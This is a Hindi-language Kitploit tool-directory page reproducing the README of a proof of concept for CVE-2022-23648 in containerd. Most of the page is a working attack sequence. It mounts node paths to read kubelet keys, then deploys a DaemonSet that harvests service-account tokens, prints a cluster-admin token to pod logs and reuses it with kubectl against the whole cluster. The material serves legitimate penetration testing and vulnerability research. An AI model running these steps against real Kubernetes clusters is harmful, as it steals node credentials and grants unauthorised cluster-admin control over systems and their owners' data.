Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-23648-POC — CVE-2022-23648 के लिए POC | Kitploit
उपकरण/GitHubGitHub/raesene/cve-2022-23648-poc
विशेषाधिकार वृद्धिकंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षा
GitHubraesene/cve-2022-23648-poc

CVE-2022-23648-POC

CVE-2022-23648 के लिए POC

रिपॉजिटरी देखें
361014 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-23648 के लिए PoC

यह @_fel1x के CVE-2022-23648 के लिए एक प्रूफ ऑफ कॉन्सेप्ट है। प्रकटीकरण जानकारी यहाँ, CVE जानकारी यहाँ और कुछ अधिक जानकारी तथा शमन विचारों वाला एक ब्लॉग यहाँ है। Containerfile में आवश्यक जानकारी है, और आप विभिन्न पथ आज़माने के लिए VOLUME के लक्ष्य को बदल सकते हैं।

इसे काम करते दिखाने का सबसे आसान तरीका KinD का उपयोग करना है, जिसमें शोषण योग्य इमेज हैं।

बुनियादी परीक्षण प्रक्रिया

जब तक /var/lib/kubelet/pki में नोड पर किसी तरह बहुत सारा डेटा न हो, यह एक सुरक्षित परीक्षण होना चाहिए।

  • kind create cluster --image=kindest/node:v1.21.1
  • kubectl create -f pod-manifest.yaml
  • kubectl exec poctest -- ls /var/lib/kubelet/pki/

और यदि आपको kubelet.key सहित फ़ाइलें वापस मिलें, तो यह काम कर गया :)

cluster-admin तक एस्केलेट करने का प्रयास करें

नोट: इसे प्रोडक्शन क्लस्टर पर आज़माने का प्रयास न करें। एक भेद्य Containerd इस हमले वाले पॉड में बहुत सारा डेटा डुप्लिकेट कर सकता है और डिस्क स्थान समाप्त कर सकता है। साथ ही, यह cluster-admin SA टोकन को पॉड लॉग में प्रिंट करेगा, जिनके सादे पाठ में लॉगिंग गंतव्य पर भेजे जाने की संभावना है

यह एक डेमनसेट चलाएगा जो नोड पर सभी Kubernetes सेवा खाता टोकनों को सूचीबद्ध करने का प्रयास करता है और यदि यह cluster-admin टोकन पाया जाता है तो इसे पॉड के लॉग में प्रिंट करता है।

  • kubectl apply -f ds.yaml
  • kubectl --token="$(kubectl logs -l app=poctest | head -1)" auth can-i '*' '*' -A

यदि yes प्रिंट होता है, बधाई हो, आपके पास एक अल्पकालिक cluster-admin सेवा खाता टोकन है, चलाएँ:

  • kubectl logs -l app=poctest | head -1 | awk -F\. '{print $2}' | base64 -d यह देखने के लिए कि यह कौन सा SA है

  • kubectl --token="$(kubectl logs -l app=poctest | head -1)" get pods -A

  • kubectl --token="$(kubectl logs -l app=poctest | head -1)" auth can-i --list

लेखक

  • Rory McCune @raesene

योगदानकर्ता

  • @BradGeesaman - एस्केलेशन डेमनसेट
टूल डाउनलोड करें